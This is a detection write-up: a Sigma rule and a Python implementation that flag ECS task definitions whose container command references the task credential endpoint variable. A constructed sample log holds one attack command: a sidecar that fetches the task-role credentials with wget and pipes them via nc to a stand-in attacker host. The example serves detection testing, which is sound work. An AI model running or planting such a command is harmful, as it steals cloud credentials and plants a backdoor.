AWS ECS Task Definition That Queries The Credential Endpoint

Detects when an Elastic Container Service (ECS) task definition includes a container command that references $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI. The ECS agent sets that environment variable so a task can fetch its task IAM role credentials from the container credential endpoint (http://169.254.170.2 plus the relative URI). A container whose command reads those credentials and sends them elsewhere is a straightforward way for an adversary to plant a backdoor for persistence or to escalate privileges to the task role.

Sigma rule

title: AWS ECS Task Definition That Queries The Credential Endpoint
id: b94bf91e-c2bf-4047-9c43-c6810f43baad
status: experimental
description: |
    Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.
    This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
references:
    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py
    - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html
    - https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html
author: Darin Smith
date: 2022/06/07
modified: 2023/04/24
tags:
    - attack.persistence
    - attack.t1525
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        eventSource: 'ecs.amazonaws.com'
        eventName:
            - 'DescribeTaskDefinition'
            - 'RegisterTaskDefinition'
            - 'RunTask'
        requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
    condition: selection
falsepositives:
    - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons
level: medium
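The selection above, implemented in plain Python and run over a constructed CloudTrail log so the match and non-match cases can be seen side by side. This is an added example, not code from SigmaHQ or from the rule's author; the function names (`iter_command_strings`, `matches_rule`, `scan_cloudtrail`) and the sample records are assumptions made for illustration. The walk over `requestParameters.containerDefinitions[*].command[*]` reflects how CloudTrail records the RegisterTaskDefinition request body: `containerDefinitions` is a list, and each container's `command` is a list of argv tokens.

```python
import json
from typing import Any, Iterator

# Selection terms copied from the Sigma rule above.
EVENT_SOURCE = "ecs.amazonaws.com"
EVENT_NAMES = {"DescribeTaskDefinition", "RegisterTaskDefinition", "RunTask"}
NEEDLE = "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"


def iter_command_strings(request_params: Any) -> Iterator[str]:
    """Yield every string under requestParameters.containerDefinitions[*].command[*].

    A bare string or a single dict is tolerated in case a log pipeline
    flattens the lists before the rule is evaluated.
    """
    if not isinstance(request_params, dict):
        return
    definitions = request_params.get("containerDefinitions")
    if isinstance(definitions, dict):
        definitions = [definitions]
    if not isinstance(definitions, list):
        return
    for container in definitions:
        if not isinstance(container, dict):
            continue
        command = container.get("command")
        if isinstance(command, str):
            yield command
        elif isinstance(command, list):
            yield from (token for token in command if isinstance(token, str))


def matches_rule(event: dict) -> bool:
    """Return True when one CloudTrail record satisfies the rule's selection."""
    if event.get("eventSource") != EVENT_SOURCE:
        return False
    if event.get("eventName") not in EVENT_NAMES:
        return False
    # Sigma's |contains is a substring test against each value of the field.
    return any(NEEDLE in value
               for value in iter_command_strings(event.get("requestParameters")))


def scan_cloudtrail(log_text: str) -> list[str]:
    """Parse a CloudTrail log file ({"Records": [...]}) and return matching eventIDs."""
    records = json.loads(log_text).get("Records", [])
    return [r.get("eventID", "<no-id>") for r in records if matches_rule(r)]


# Constructed sample log, not real CloudTrail output. evt-1 registers a sidecar
# that reads the task-role credentials and ships them off-host; the others are
# benign or outside the rule's scope.
SAMPLE_LOG = json.dumps({"Records": [
    {"eventID": "evt-1", "eventSource": "ecs.amazonaws.com",
     "eventName": "RegisterTaskDefinition",
     "requestParameters": {"family": "web", "containerDefinitions": [
         {"name": "web", "image": "nginx:1.25"},
         {"name": "sidecar", "image": "alpine:3.19",
          "command": ["sh", "-c",
                      "wget -qO- 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
                      " | nc attacker.example 4444"]}]}},
    # Normal registration: the command is just the application entrypoint.
    {"eventID": "evt-2", "eventSource": "ecs.amazonaws.com",
     "eventName": "RegisterTaskDefinition",
     "requestParameters": {"family": "web", "containerDefinitions": [
         {"name": "web", "image": "nginx:1.25",
          "command": ["nginx", "-g", "daemon off;"]}]}},
    # Read-only call: the request body only names the task definition.
    {"eventID": "evt-3", "eventSource": "ecs.amazonaws.com",
     "eventName": "DescribeTaskDefinition",
     "requestParameters": {"taskDefinition": "web:7"}},
    # Same string, but the event is not from ECS.
    {"eventID": "evt-4", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionConfiguration",
     "requestParameters": {"containerDefinitions": [{"command": ["echo", NEEDLE]}]}},
]})


if __name__ == "__main__":
    print(scan_cloudtrail(SAMPLE_LOG))  # ['evt-1']
```

Two things worth keeping in mind when tuning this: the rule keys on the literal variable name, so a command that already carries the expanded credential URL, or that uses AWS_CONTAINER_CREDENTIALS_FULL_URI instead, will not match unless the needle list is extended; and a DescribeTaskDefinition request body contains only the task definition identifier, so that eventName never contributes a `containerDefinitions.command` value to test against.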
